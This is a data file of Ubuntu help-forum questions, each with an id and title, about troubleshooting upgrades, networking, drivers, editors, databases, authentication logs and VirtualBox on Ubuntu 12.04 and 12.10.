222969	trouble after ubuntu 12.10 upgrade	over night i tried to upgrade to ( k ) ubuntu 12.10 . unfortunately kdm ( neither lightdm ) does n't show up after boot . i found several posts describing errors due to the migration from kdm to lightdm . some sugest reinstallation of kdm . therefore i logged into a shell and tried to install it using apt-get . however it turned out that network is not available . ifconfig showes that only the loopback device lo is available . what can i do to get lan or wlan network working on the commandline ? i relized that grub still runs the old tuxonice kernel which i installed from ppa . is it possible that the installation did n't finish and left me in an inkonsistent state in which the kernel version does not match the modules ? how can i proceed the installation from the downloaded packages ?
222971	partition configuration to avoid reinstalling applications after update	the major bane when i update ubuntu ( which is way more frequent than windows ) is that i lose all installed application . to be precise i do a lot of maple , matlab , geogebra & for all of those i install java platform which too isnt very straightforward plus the license management things , which really give me craps . i do n't install application in /home ( to be made available to all users ) thus a separate /home partition is meaningless . can we circumvent this problem somehow such that java dependent applications along with jdk does n't blow away after update , may be by a separate partition ( just like /home ) where only custom ( other than provided by ubuntu software center ) install application resides further : i use specific binary of java ( java6 update 32 ) , its an important requirement for me , thus i do n't want to let it crash/overwritten or similar
222973	internet connection lost for browser but still there for transmission	i brought dell inspiron n5050 few months back . from day 1 i am getting problem with wired connection , i am able to use web browser for few minutes then all of the sudden i lost internet connection but i do n't know why transmission is still able to download torrent from internet . today i installed steadyflow download manager and i see it is also downloading fine but beside these everything fails to connect to internet . one more thing internet connection is recovered automatically after few minutes . but this problem occurred repeatedly i have reinstalled ubuntu 12.04 three times , but problem is still there
222974	how to prevent thunderbird gmail/imap from marking deleted/archived emails as read	i have thunderbird setup to use gmail imap . i followed the various guides that recommend setting edit- > account settings- > server settings- > when i delete a message- > remove it immediately . unfortunately this did n't have quite the effect i wanted and after more digging i discovered here that : [ thunderbird ] [ gmail ] mark deleted = archive copy to [ gmail ] /trash = delete permanently remove it immediately = archive unfortunately whenever i deleted ( archived ) a message it was also marked as read whether it had been or not . i did n't want this because i like to keep my inbox clean and archive anything that does n't actually matter , such as funny emails , etc . and then go back and look through the archive later when i have time . what settings do i need to prevent messages from being marked read when i delete them ? i 'm using thunderbird 17.0 on ubuntu 12.04
222976	pause upgrade halfway through ?	with my current internet connection , it will take about 18 hours to download all the files needed to upgrade from 12.04 to 12.10 . is there a way that i can first download the files in the background and then do the upgrade ? alternatively , if i use the graphical distribution upgrade tool via update manager , can i cancel halfway through the downloads and start again where i left off , or will it delete the files it 's downloaded so far ?
222977	install eclipse modelling tools once i have already downloaded the package	i am trying to download the eclipse modelling tools on ubuntu . i have downloaded the eclipse from eclipse site and once i extracted the file , i see the eclipse icon , but i can not run it , i think , i need to install it first . but i dont know how , i am new to unix , i think i should first configure and do something like make so that it will be installed , can someone please help me . thanks for help
222982	enable mobile broadband not working	i 'm using an evdo usb modem on 12.04 . it works perfectly fine for few times . but now on wards when ever i try to connect it shows not enabled in status . i tried to enable it by ticking `` enable mobile broadband '' but still it shows not enabled but that option gets a checked ( tick ) mark . and when ever i restart my system `` enable mobile broadband '' option autamatically unchecked . any help please
222983	how to prevent new terminal windows opening in same directory ?	hitting ctrl-shift-n when an existing terminal window has focus opens a new terminal window with the same working directory as the old terminal window . how can i prevent this ?
222984	can i log in with other user 's account ?	i would like to ask you about login command in bash shell ubuntu . i entered # login then it asks me about username and password . is this a way to log in with other user 's account ?
222988	pidgin icon not showing in system tray	whenever i close pidgin it stopped showing in system tray ( after the upgrade from 12.04 to 12.10 ) . the setting is `` show system tray : always '' in pidgin .
222991	problems with network connection : `` sudo : unable to resolve host ( none ) ''	my ubuntu 12.04 lts lost internet connection . it just acts like it has lost internet connection . when i go to terminal in says : user @ ( none ) . when i run any sudo command , it says sudo : unable to resolve host ( none ) if i try firefox , nothing happens . but when i try pinging , it responds fine ( but only if it has been pointed to a ip address ) .
223009	how to remove anomalous warning after closing gvim	i have added the function gvim ( ) { /usr/bin/gvim -f `` $ @ '' & true ; } to my .bashrc file . but i still have a problem . i open file 111 with gvim and close it and a warning like [ 10 ] + ... /usr/bin/gvim -f $ * '' ? is displayed in my terminal . how do i remove it ?
223012	how to install mysql client on 10.04 ?	how can i install mysql client on ubuntu 10.04 ? i have already installed mysql 5.1 binary on server . i am not able to find right package for apt-get please help .
223016	setting permission for ntfs partition	i have a ntfs partition on my pc . it shares data between linux and a windows dual boot system . my /etc/fstab line for that is : # mount dati at boot= uuid=01cd9e64e80bd460 /mnt/dati ntfs nls=iso8859-1 , umask=0022 , uid=1000 , gid=1000 , dmask=027 , fmask=137 0 0 there is something wrong , because i can not make any files executable . what should i change ? in addition , can someone help me understand umask , dmask , and fmask or post a link to some guide ? summarizing : what permission should i give to a ntfs partition that is shared between linux and windows , and shared on samba network ?
223018	vim is not remembering last position	my ubuntu lts 12.04 has vim editor . if i open a file , move to a paragraph and reopen vim , then the cursor goes to beginning of the file always . this is not the expected behavior . how the vim can remember last read position after closing a file ? i tried vi also , but the result is the same : - (
223019	does anyone know how to make nautilus as a file manager in xubuntu 12.04 ?	this might look like a duplicate of other questions , but it is n't . i 'd like to know how to set nautilus as the file manager ... .avoiding it to change anything else but the file management . thanks
223022	is it possible to make task switcher in xubuntu to react on mouse click on application icon ?	is it possible to make xubuntu task switcher to react on mouse click on application icon ? and activate that application on mouse click ?
223025	how to stop mysql server with root	how can i stop mysql server ( installed using binary installation under /usr/local/mysql ) ? when i go in /usr/local/mysql/bin and execute command mysqld stop i get following error message : [ error ] fatal error : please read `` security '' section of the manual to find out how to run mysqld as root ! [ error ] aborting [ note ] mysqld : shutdown complete and i can still see process for mysql server . same happens when i try to do it with mysqld in /etc/init.d
223026	how do i get wireless usb adapter tl-wn727n working in 12.04 ?	annyone knows how to get the drivers for tl-wn272n ? tried the command : sudo apt-get install linux-backports-modules-wireless-generic wich didnt work ( didnt find the package ) . the info from lsusb bus 001 device 002 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter
223030	how do i check if a package is available for install ?	i have installed ubuntu 12.04 lts on amazon ec2 instance along with tomcat and mysql . tomcat , java and mysql packages were available along with ubuntu and i did n't have to download them . now i wish to install percona xtrabackup to my server . now , how do i find if a certain package is already available with the installation or i have to install it externally ?
223034	removing empathy from 12.10 wants to remove the gnome-core package	i would like to remove empathy from my ubuntu system , ( i am currently running quantal without unity , just gnome ) . when i try remove it in synaptic it also wants to remove gnome-core , which i assume will break my setup . am i correct ?
223036	can we use svn2cl on launchpad buildbots ?	i 've done a build bot for doxbox and currently i 'm merging a packaging bzr repo - but that repo has the changelog outdated - and i do n't want to have to maintain it . i 've read dosbox autogenerates it 's changelog with svn2cl on the svn local repo . i 'm asking if there is some way to do this in the launchpad recipe bellow . however , note if you 're not familiar with launchpad that the code mirrors that it uses do n't use svn ( everything is periodically imported into a bzr repo ) and that recipes do n't allow internet access . https : //code.launchpad.net/~i30817/+recipe/dosbox-patched
223041	will simple encryption be coming to 12.04	will the simple encryption check box ( on ubuntu 12.10 live cd ) be coming to the ubuntu 12.04.x release ?
223043	after upgrade , zentyal replaced apache2 and svn	after upgrading our server to 12.04 our wiki and other pages which are serviced by apache2 are no longer reachable . there is only the zentyal administration page . our svn is also not reachable . what could the problem be and how can they be restored ?
223045	forked-daapd without avahi	i 'm trying to setup forked-daapd , but i 'd prefer it if i could run it without avahi ( or rather define my own avahi service instead of using the dbus api ) . the reason is that i want a netatalk share for my time machine backups and a samba share for the symbolic link support ( netatalk does n't support symlinks ) . those two are defined as different services in avahi . to make that work , i have to disable avahi 's dbus api , or else netatalk tends to take over all the services ( osx prefers afp over smb ) . if i now try to start forked-daapd , it just does n't . forked-daapd requires avahi 's dbus api to be enabled and running . is there some sort of way around this limitation , so that i can manually define my own daap service in avahi . maybe something like enabling but ignoring the dbus in avahi , or launching a duplicate avahi daemon with a different config file ?
223048	how to create appindicator with python ?	i have no knowledge of python , but because ubuntu recommends it i will use it for the appinidcator.. so i got these 2 files : and the code of the .py file is : # ! /usr/bin/python import appindicator import pynotify import gtk a = appindicator.indicator ( 'wallch_indicator ' , '/home/paul/scripts/wallch_tray.png ' , appindicator.category_application_status ) a.set_status ( appindicator.status_active ) m = gtk.menu ( ) ci = gtk.menuitem ( 'check ' ) qi = gtk.menuitem ( 'quit ' ) m.append ( ci ) m.append ( qi ) a.set_menu ( m ) ci.show ( ) qi.show ( ) def checkstatus ( item ) : import urllib2 htmltext = urllib2.urlopen ( 'http : //youtube.com/wichitsombat ' ) .readlines ( ) neededline = [ ] for line in htmltext : if line.strip ( ) .find ( 'stat-value ' ) > -1 : neededline.append ( line ) n = neededline [ 0 ] subs = n [ n.find ( ' > ' ) +1 : n.rfind ( ' < ' ) ] n = neededline [ 1 ] views = n [ n.find ( ' > ' ) +1 : n.rfind ( ' < ' ) ] # show the notification message pynotify.init ( 'wallch_indicator ' ) n = pynotify.notification ( ' < b > paulgramming channel < /b > ' , 'subscribers : % s views : % s ' % ( subs , views ) , 'notification-message-im ' ) n.show ( ) ci.connect ( 'activate ' , checkstatus ) def quit ( item ) : gtk.main_quit ( ) qi.connect ( 'activate ' , quit ) gtk.main ( ) code taken from this video how to make notification program using python when i run python wallch_indicator.py it keeps running but i do n't see the indicator..what am i doing wrong ?
223055	google music manager - error while installing	i followed this post on omg ubuntu ! , about how to install google play to sync your music . i have tried to install it but it shows me this message : the installation of a package which violates the quality standards ins't allowed . this could cause serious problems on your computer . please contact the person or organisation who provided this package file and include the details beneath . lintian check results for /home/user/downloads/google-musicmanager-beta_current_amd64.deb : e : google-musicmanager-beta : file-in-etc-not-marked-as-conffile etc/cron.daily/google-musicmanager any suggestions ?
223056	can not open display	i have an old desktop that i installed ubuntu on , the installation went well . when i rebooted my computer i get the following info on the screen : change display mode to 1280x ... . 60.00hz my graphics card is an ati hd 5450 i have tried the fix at the following url : http : //www.myapitips.com/2011/11/02/how-to-change-monitor-resolution-in-ubuntu-11-10/ however when i try something like randr my computer gives me an error : ca n't open display . any ideas ?
223057	ubuntu uninstalled , can not access windows partition .	i gave my dad my old laptop which had windows dual booted with ubuntu 12.04 , he did a windows recovery and chose the option 'entire hd ' . now when he tries to boot it give this error : error no such partition grub rescue i am guessing it 's because it was going to the ubuntu bootloader , how do i fix this so he can access windows again ?
223059	define new shortcut keys without overwriting existing keys	my laptop keyboard does not have media shortcut keys ( e.g . `` next track '' , etc ) . i frequently use the laptop connected to an external keyboard , which does . i go to settings- > keyboard- > shortcuts tab , and select `` sound and media '' , and i see that `` next track '' is bound to the shortcut key `` audio next '' . i see that i can replace this with a custom key binding , but it overwrites the `` audio next '' shortcut . i 'd like a solution that allows me to map a second shortcut to this command without overwriting it . i see that i can define custom keys , so i could make a unique mapping for rhythmbox-client -- next , etc , but that would be a solution specific to rhythmbox . i 'm looking for a more native ubuntu solution that will work in any player the same way the current `` audio next '' media keys do on my external keyboard . any ideas ?
223064	can i add a shortcut in xubuntu to make a top panel ( one with window buttons ) appear on the screen even if in fulscreen mode ?	when i used windows xp , when i pressed a key with the windows logo , start menu opened and the bottom panel with window buttons appeared no matter what . even in a fullscreen mode it was possible to click windows button , then start menu opened and window buttons panel appeared . on xubuntu when i press a hotkey to open applications menu , it opens , but the pannel do n't appear . is it possible to make panel appear on hotkey ? maybe together with applications menu when i press a hotkey to open applications menu .
223066	stuck on ubuntu startup screen	since yesterday , my system wo n't get past the startup screen ( the ubuntu logo with the blinking red dots ) . i left it for over an hour and did n't get the login screen . it was working normally before that and i do n't recall any changes ( no new software installed , etc ) . i can login through the terminal with alt+f1 but i do n't know what to do to get the graphic mode . the command startx fails . i 'm running ubuntu 12.10 64 bits ( kernel 3.5.0.18 ) on a core i5 with intel motherboard . no video card or sound card .
223069	cheese webcam problem	i have got a new webcam : logitech . but today when i have connected it to my pc ( ubuntu 12.10 ) and tried to open with cheese webcam booth i 've got something like this : problem is that i can take picture and it takes picture cool , but privew area is black , and it do n't shows nothing . what is my problem ? ? p.s . works good with `` kamerka '' edit camera is logitech c910
223073	break output of command at full page or per line	i am trying to check if a package is already present in the my ubuntu distro by using the command apt-cache search < name > the resultant output of command for java package was very long and ran into several pages . my question how to break the output in ubuntu at a page full and every line ?
223075	how do i locate and remove proprietary drivers	i 'm planning to move my ubuntu install to another machine . i think the proprietary drivers like those for nvidia and wireless might cause issues with that hardware . how can i find all these tricky packages and remove them before i make an image of my hard drive and proceed further . i know i have a nvidia graphics card , i 'll remove the drivers for that but i do n't know what other problematic packages may be installed .
223077	frequent abnormal shutdowns/system crashes	it 's been almost 5 days since i have installed ubuntu and almost 6th time that my laptop has been crashed entirely and it shuts down abnormally . actually , it heats up and i have to wait for 20 odd minutes before i can turn it on again . a message appears that my pc crashed due to overheating which may damage my hard disk . the crashes happened when i tried to open some application that freeze my pc not even giving me enough time to go to system monitor and end process . sometimes the culprit application which caused crash is ever-pad , sometime it 's team-viewer , sometimes it 's some other . this is something very serious . the last crash occurred at 09:14:40 . kindly click here to view system log . i want to stick to ubuntu and the same laptop as i had serious issues with windows and i nearly went out to dump my laptop and purchase a more powerful system . below are my hw/os specs . kindly advice on how to resolve this issue ubuntu 12.10 kernal 3.5.0-18-generic gnome 3.6.0 memory 2.0gb processor : genuine intel cpu t2500 @ 2.00ghz x 2 available disk space : 63.7 gb thanks in advance
223078	how to fix usb problem ?	actually i have a problem with my usb ports , when i plugged in any device ( specially removable media ) to usb ports , it 's quickly plugged in and plugged out like the flasher , and the removable partition appears ( mount ) and then disappears ( unmount ) and it will always happen.. my system : ubuntu 12.4-64bit , motherboard : gigabyte ga-m52l-s3 .
223080	google chrome ( not chromium ) is crashing xfce on startup . where can i find some detailed logs of the issue ?	i 'm using xubuntu 12.10 and every time i open chrome , the desktop enviro crashes then automatically restarts , prompting me to log in again . this is the latest x86 .deb downloaded from chrome 's website . i 've tried both installing the .deb using the software package manager and using sudo dpkg -i , same issue for both , except that the package manager puts out an alert that says `` this package is of bad quality '' , but doing a quick google search reveals that particular message is a bug in chrome and it 's safe to ignore .
223081	waking up from `` do nothing '' state when lid closed	my laptop hp pavillion dv6 8 gb ram will not wake when you open the lid , key strokes and mouse movement is not recorded . any one have any ideas
223083	how to identify an unknown entry in `lshw` ?	i have an unknown entry in my laptop hardware list . i was searching for my bluetooth adapter name and driver when i saw it . how do i identify what device is that ? also where do i find information on my bluetooth driver ? snapshot :
223084	usb mouse and keyboard is not being recognized	i am running ubuntu 12.04 from my external usb hard drive on my gateway laptop . the internal hard drive of the laptop went bad , that is why i am using the external one . i have a usb mouse and keyboard but it is not being recognized . is this due to the fact that i am running it on the external hard drive ? if not , is there a way of fixing this issue ?
223087	best collaborative task manager for ubuntu and android ?	right now i use astrid as a task manager , since i can share tasks with our loco team members and everything works fine . i use it with google chrome and android , but i do n't really like using chrome for that . so , does anyone know if there is an app that does it ? what it need to have : ability to share tasks with others ; android app ; ubuntu app . aside from that , i do n't need much . astrid is awesome , but without a desktop client it 's a little annoying to use . so
223090	is it safe to manually delete the /var/cache/apt content ?	on an embedded system with a very limited disk space i have the folder /var/cache/apt full with some 700mb of srcpkgcache.bin . * and a couple of large *.bin files . performing sudo apt-get clean did not make a visible difference . is it safe to manually delete these *.bin* files ?
223095	pdf editing apps ?	i 'm looking for app capable of editing pdf file ( text , insert images ) alternatively i need an app which able to properly convert pdf to doc/odf and back to pdf
223096	deleted windows partition , now i ca n't get into ubuntu	back story : i installed ubuntu with wubi . i had windows on one ntfs partition , then i made a new ntfs partition in which i put wubi in and where my ubuntu os was born . eventually i moved /home into another partition and made a swap partition , but i digress . i deleted my original ntfs partition where windows is not thinking it would not matter but now i ca n't get into ubuntu . and the weird thing is that when i boot my computer i still see the option to boot into both windows and ubuntu . when i try to boot into windows , it tries to fix stuff and never succeds . when i try to boot into ubuntu , it shows me `` can not find grldr in all devices . press ctrl+alt+delete to restart '' . so , what do you guys think ? i just want ubuntu running again , with all my stuff in /home there and all my system preferences how i like them . edit : boot repair disk did its thing but it did not fix anything . i think i will be installing ubuntu from cd then transferring /home and such manually .
223100	force all windows to open at a set resolution ( 'width x height ' pixels )	is it possible to force all application windows to open at a specific resolution ( i.e . a set specific size like 1280x720 pixels ) ?
223110	lm-sensors shows only 1 core temp	on intel atom machine , is this perfectly normal ? i thought i 'd see 2 core temps - core 0 and core 1 $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +68.0째c ( crit = +99.0째c ) coretemp-isa-0000 adapter : isa adapter core 0 : +55.0째c ( crit = +100.0째c )
223111	p513w photo printer driver	when i go thru the installation wizard i do n't find a driver for the p513w on the list . so i 've been through all 7 ( like 1100 ) that are on the list but none of them work . anyone got any ideas ? tim
223114	how to remove individual unity webapps ' items from message indicator ?	in first days of trying ubuntu 12.10 i installed a bunch of unity webapps like launchpad , twitter , facebook , linkdin , etc . recently i found some of them useless and removed the related `` unity-webapps-* '' packages . they no longer appear in the launcher and every time i visit the main website in firefox , they offer to install the unity webapp for that specific website as well . but the problem is the items for them ( linkedin , twitter and facebook ) are placed in the message indicator yet after thunderbird and of course they do n't indicate anything . how can i completely remove the webapps items from unity ?
223115	why i can not find in /etc/inittab ?	i have learned from the wikipedia that init is usually called by the kernel with an argument to specify the runlevel , in order to do different things according to different runlevel , and that runlevel can be found from /etc/inittab , but why i can not find in /etc/inittab ?
223116	software center matlab app preventing app installation	i have installed an app from the software center that is called matlab . but then it turns out that it is n't actually matlab , but some support package for it , and i when i try to remove it , it opens a new window asking for the directory of matlab . i ca n't close it except by force , and every time i try to install a new app , it appears , and prevents the app from installing . i 've searched around google , and lots of forums , but no answer related to this app , only the actual matlab . i tried searching for the app in file system , and deleted the matlab.desktop and still the problem did n't go away . this app has no actual directory in the file system , and it is quite annoying . even when i tried app update , it appears after the download has finished , thus preventing the installation . now i could try to install the actual matlab , which i 'm currently downloading , but it takes too much space , and i barely have that space , because i 've dual booted with windows 7 and i have only 18 gb for ubuntu and the rest of the 400 gb windows . has anyone faced this problem before , and does anyone know how to fix this ?
223118	ubuntu server 10.04 behind proxy . ping works apt-get fails	i have installed 4 ubuntu servers on a virtual machine . same installation procedure where i set the proxy , domain , ip during the installation . it appears that 2 of the machine have no issues at all . both ping and apt-get . but for some unknown reason the other 2 can ping anything including security.ubuntu.com and us.archive.ubuntu.com but ca n't do sudo apt-get update . so all of them have the file /etc/apt/apt.conf acquire : :http : :proxy `` 10.10.19.21 '' ; what i 've noticed here is that there is no port number for any of them.even with that 2 servers still can update via apt-get for now there is no http_proxy set in either /etc/environment . can anyone help you ? thank you .
223124	mouse pointer size only	i want to know if there is a way to increase the size of the mouse pointer only ( not the cursor ) in ubuntu 12.10 ? have already used dconf editor to try and do this but it only changes the cursor not the mouse pointer size .
223127	ubuntu 12.04 high cpu usage and high temperature	ubuntu 12.04 on my laptop uses more than 50 percents of each core even if nothing is running . i have checked from system monitor and from htop , both of them show that each of 4 cpus percentage is above 50 percents . i have run sensors to check the temperature these are results when only firefox is running : acpitz-virtual-0 adapter : virtual device temp1 : +80.0°c ( crit = +108.0°c ) asus-isa-0000 adapter : isa adapter temp1 : +80.0°c coretemp-isa-0000 adapter : isa adapter physical id 0 : +82.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +82.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +74.0°c ( high = +86.0°c , crit = +100.0°c ) what can be problem ? edit : my laptop : asus u36sd rx167v intel core i7-2620m 8gb ram nvidia geforce gt520m bumblebee did not help
223131	how to remove a directory in www folder	i 'm using ubuntu 12.10 i have a folder inside /var/www/wordpress/wp-content/themes/myfolder called myfolder . inside myfolder there are subfolders . now i can not remove it via the gui , and when using terminal it also does not work , perhaps because i 'm doing it wrong . i said : sudo rmdir /var/www/wordpress/wp-content/themes/myfolder/* and i also tried just rm , but it keeps telling me `` directory not empty '' and some other errors as well . how do i delete it then that folder with all its contents ? thank you
223133	how to quickly open an application for the 2nd time via dash ?	when i want to open an application via dash , i just hit super , type the first letters , and hit enter . for instance : super , `` drop '' , enter to start dropbox . however , if i want to start an application again , dash remembers it , but i can not start it by hitting enter although `` drop '' is still in there , and dropbox is in the first position . why ? how can i ( without using the mouse ) start an application again ? update : better example ( hopefully ) : super ... type `` ged '' ... enter to start gedit close gedit super ... and now ? `` ged '' is remembered , gedit is still in pole position ready to be started . however , hitting enter does not work . how can i start an application again ? - without using the mouse or retyping ? if i have to retype , it makes no sense that dash remembers the application and my typed letters . i assume there is a way to open the application again by just : super + enter ( or something similar ) . thanks !
223134	pxe error after installing on lenovo u410 . how to solve it ?	i changed the handler in bios from raid to ahci , and then installed ubuntu 12.10 amd64 on 32 gb ssd . i am getting an error every time when i boot : pxe device not found check the cable . what should i do now ?
223136	pavucontrol does n't show bluetooth headset	i 'm trying to use an lg hbs700 bluetooth headset with my laptop ( lenovo thinkpad x1 carbon running xubuntu 12.10 ) . i 'm able to successfully connect the headset using the blueman program , but when i go to pavucontrol , all i see under the `` output devices '' tab is `` speakers '' and `` headphones '' , neither of which work with the headset . i 've tried setting the headset to both `` audio sink '' and `` headset service '' , but neither worked .
223140	how do i reload system settings from command line on kubuntu ?	to better understand what i need : in systemsettings ( kde ) , in icon theme module , after i change the icon theme , i click apply . i need to know which command line i run to do the same when i click apply button . it is qbus related ?
223143	broken package after update : linux-headers , error brokencount > 0	ubuntu 12.04 . after an update , i get a red warning icon in the system tray , warning about an error : broken count > 0 opening update manager , i see that the broken package is linux-headers-3.2.0-33-generic-pae ( new install ) specificaly i have my ubuntu on an aspireone with 8gb internal storage . i tried apt-get clean as suggested in another question on this site , and tried reinstalling the package in synaptic . i have tried to reboot but to no avail . i have also tried apt-get install -- fix-broken and i get the following : sudo apt-get install -- fix-broken [ sudo ] password for elina : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-headers-3.2.0-33-generic-pae the following new packages will be installed : linux-headers-3.2.0-33-generic-pae 0 upgraded , 1 newly installed , 0 to remove and 38 not upgraded . 1 not fully installed or removed . need to get 0 b/977 kb of archives . after this operation 11,3 mb of additional disk space will be used . do you want to continue [ y/n ] ; y ( reading database ... 437051 files and directories currently installed . ) unpacking linux-headers-3.2.0-33-generic-pae ( from ... /linux-headers-3.2.0-33-generic-pae_3.2.0-33.52_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-33-generic-pae_3.2.0-33.52_i386.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-3.2.0-33-generic-pae/include/config/usb/gspca/sonixb.h.dpkg-new ' ( while processing `./usr/src/linux-headers-3.2.0-33-generic-pae/include/config/usb/gspca/sonixb.h ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-33-generic-pae_3.2.0-33.52_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 've tried all suggestions i could find : sudo apt-get clean sudo apt-get autoclean sudo apt-get autoremove sudo apt-get update sudo apt-get upgrade sudo apt-get -f install sudo apt-get install -- fix-broken then i saw that on the error there was a mention about free space . so i did a df -h and the result was : filesystem size used avail use % mounted on /dev/sda1 7,0g 5,5g 1,1g 84 % / udev 235m 4,0k 235m 1 % /dev tmpfs 97m 816k 96m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 242m 352k 242m 1 % /run/shm i see that on my root folder i have 1.1gb free . the broken package is linux-headers-3.2.0-33-generic-pae_3.2.0-33.52_i386.deb which only takes up 11.3mb on my hard drive . i 'm soooo lost . i really hope there is something i 'm missing here . i do n't want to go about reformatting this bucket . it 's really not worth the time . any help for fixing this would be hot .
223149	ubuntu 12.04 lts temporarily freezing everytime i download things from the internet or terminal is running a command	as the title states , i recently reinstalled 12.04 lts due to some problems i was having . the good news is that this fixed the problem , but the bad news is that now everything on ubuntu seems really slow . starting up is a lot slower , completing commands in the terminal are taking way longer than normal to finish , and while i am waiting for these commands to finish running my computer freezes and i can not do anything until it is done . can anybody please help ? system spec : i2500k radeon 6950 8gb ram
223150	ubuntu 12.04 // likewise open // unable to ever authenticate ad users	so ubuntu 12.04 , likewise latest from the beyondtrust website . joins domain fine . gets proper information from lw-get-status . can use lw-find-user-by-name to retrieve/locate users . can use lw-enum-users to get all users . attempting to login with an ad user via ssh generates the following errors in the auth.log file : nov 28 19:15:45 hostname sshd [ 2745 ] : pam unable to dlopen ( pam_winbind.so ) : /lib/security/pam_winbind.so : can not open shared object file : no such file or directory nov 28 19:15:45 hostname sshd [ 2745 ] : pam adding faulty module : pam_winbind.so nov 28 19:15:51 hostname sshd [ 2745 ] : error : pam : authentication service can not retrieve authentication info for domain\\user.name from remote.hostname nov 28 19:16:06 hostname sshd [ 2745 ] : connection closed by 10.1.1.84 [ preauth ] attempting to login via the lightdm itself generates similar errors in the auth.log file . nov 28 19:19:29 hostname lightdm : pam unable to dlopen ( pam_winbind.so ) : /lib/security/pam_winbind.so : can not open shared object file : no such file or directory nov 28 19:19:29 hostname lightdm : pam adding faulty module : pam_winbind.so nov 28 19:19:47 hostname lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` domain\user.name '' nov 28 19:19:52 hostname lightdm : [ lsass-pam ] [ module : pam_lsass ] pam_sm_authenticate error [ login : domain\user.name ] [ error code:40022 ] nov 28 19:19:54 hostname lightdm : pam unable to dlopen ( pam_winbind.so ) : /lib/security/pam_winbind.so : can not open shared object file : no such file or directory nov 28 19:19:54 hostname lightdm : pam adding faulty module : pam_winbind.so attempting to login via a console on the system itself generates slightly different errors : nov 28 19:31:09 hostname login [ 997 ] : pam unable to dlopen ( pam_winbind.so ) : /lib/security/pam_winbind.so : can not open shared object file : no such file or directory nov 28 19:31:09 hostname login [ 997 ] : pam adding faulty module : pam_winbind.so nov 28 19:31:11 hostname login [ 997 ] : [ lsass-pam ] [ module : pam_lsass ] pam_sm_authenticate error [ login : domain\user.name ] [ error code:40022 ] nov 28 19:31:14 hostname login [ 997 ] : failed login ( 1 ) on '/dev/tty2 ' for 'domain\user.name ' , authentication service can not retrieve authentication info nov 28 19:31:31 hostname login [ 997 ] : failed login ( 2 ) on '/dev/tty2 ' for 'domain\user.name ' , authentication service can not retrieve authentication info i am baffled . the errors obviously are correct , the file /lib/security/pam_winbind.so does not exist . if its a dependancy/required , surely it should be part of the package ? i 've installed/reinstalled , i 've used the downloaded package from the beyondtrust website , i 've used the repository , nothing seems to work , every method of installing this application generates the same errors for me . update : hrmm , i thought likewise did n't use native winbind but its own modules . installing winbind from apt-get uninstalls pbis-open ( likewise ) and generates failures when installing if pbis-open is installed first . uninstalled winbind , reinstalled pbis-open , same issue as above . the file pam_winbind.so does not exist in that location . setting up pbis-open-legacy ( 7.0.1.918 ) ... installing packages was successful this computer is joined to domain.local new libraries and configurations have been installed for pam and nss . clearly it thinks it has installed it , but it has n't . it may be a legacy issue with the previous attempt to configure domain integration manually with winbind . does anyone have a working likewise-open installation and does the /etc/nsswitch.conf include references to winbind ? or do the /etc/pam.d/common-account or /etc/pam.d/common-password reference pam_winbind.so ? i 'm unsure if those entries are just legacy or setup by likewise . update 2 : complete reinstall of os fixed it and it worked seamlessly , like it was meant to and those 2 pam files did not include entries for pam_winbind.so , so that was the underlying problem . thanks for the assist .
223151	how ubuntu one sync works ?	i am trying to find a simple explanation of how ubuntu one sync works . for instance if i create a file on my computer does it automatically copy itself to the cloud or do i have to manually copy it to the cloud or to the ubuntu one folder in my home file ?
223153	open password protected .ods as root . forgotten password	sometime ago i made a .ods file with libreoffice calc which i password protected . i have now forgotten the password and so am unable to access the file . is there any way of bypassing the password as root using the terminal or recovering the password ? thanks .
223158	ubuntu ppc powerbook g4 wont boot live cd	i have a 867mhz powerbook g4 ti . it has 1 gig of ram . i can not get it to boot any live cd for ppc architecture . i have even tried other distro 's for ppc . all always do the same thing . they start to boot . then get to a weird washed out looking screen . tried video=ofonly and tried a few other commands specific to my video card i found others had luck with . just want to get hardy heron running on this machine .
223159	can i use the ubuntu installer to replace windows vista ?	can i use the installer to install ubuntu and then go and delete windows vista while i 'm running ubuntu ?
223161	dual boot windows 7 with ubuntu 12.04 lts	so i hava a toshiba laptop ( 64 bit ) with windows 7 home premium . first i downloaded wubi.exe and i installed it to my laptop . the only problem with this when i start ubuntu i always get an error : prefix is not set.the ubuntu boot up succesfully after 1 minute but it is very slow . so i want to reinstall ubuntu from a cd . i burnt a windows 7 home premium ( english version ) iso for a verbatim dvd-r and an ubuntu 12.04 ( desktop edition ) ( amd64 ) iso for a sony cd-r . okay i 'm a beginner . please anyone write me the method step by step : how to dual boot windows 7 with ubuntu 12.04 i have the installation disks , what is the step 2 ?
223162	oracle virtualbox does not open since upgrade	after upgrading to ubuntu 12.10 , i have been unable to restart my oracle virtualbox . jan @ jan-system-product-name : ~ $ sudo /etc/init.d/vboxdrv setup sudo : /etc/init.d/vboxdrv : command not found where do i go from here ? can anyone help , please ? i tried to install virtualbox via these commands : echo `` deb http : //download.virtualbox.org/virtualbox/debian $ ( lsb_release -sc ) contrib '' | sudo tee /etc/apt/sources.list.d/virtualbox.list wget -q http : //download.virtualbox.org/virtu ... racle_vbox.asc -o- | sudo apt-key add - sudo apt-get update sudo apt-get install virtualbox-4.2 attempts to install via package manager vbox would not start . these error reports are received : because the usb 2.0 controller state is part of the saved vm state , the vm can not be started.to fix this problem , either install the 'oracle vm virtualbox extension pack ' or disable usb 2.0 support in the vm settings ( verr_not_found ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } i installed the extension pack , no change in result . i have added myself as user , but the error report says user must be added , when i redo add user , it says user is already added . the following outputs were also received : failed to open a session for the virtual machine nuwe skelm . implementation of the usb 2.0 controller not found ! i can not access the usb 2.0 setting to disable it . where do i go from here , please ?
